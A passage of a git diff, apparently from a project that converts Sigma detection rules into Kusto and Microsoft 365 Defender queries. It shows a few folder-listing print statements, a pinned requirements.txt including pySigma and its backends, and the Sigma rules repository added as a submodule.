+print(f"\nOutput base directory: {OUTPUT_BASE}")
+print("\nFolder structure created:")
+for rule_folder in RULE_FOLDERS:
+    folder_path = os.path.join(OUTPUT_BASE, rule_folder)
+    if os.path.exists(folder_path):
+        print(f"  {rule_folder}/")
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 00000000..d28a44be
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,15 @@
+certifi==2025.11.12
+charset-normalizer==3.4.4
+idna==3.11
+Jinja2==3.1.6
+MarkupSafe==3.0.3
+packaging==24.2
+pyaml==25.7.0
+pyparsing==3.2.5
+pySigma==0.11.23
+pySigma-backend-kusto==0.4.4
+pySigma-backend-microsoft365defender==0.3.2
+PyYAML==6.0.3
+requests==2.32.5
+sigma==0.0.1
+urllib3==2.5.0
diff --git a/sigma b/sigma
new file mode 160000
index 00000000..d5188c36
--- /dev/null
+++ b/sigma
@@ -0,0 +1 @@
+Subproject commit d5188c36a1c19eb101194a9c263a8e3ce285aa1e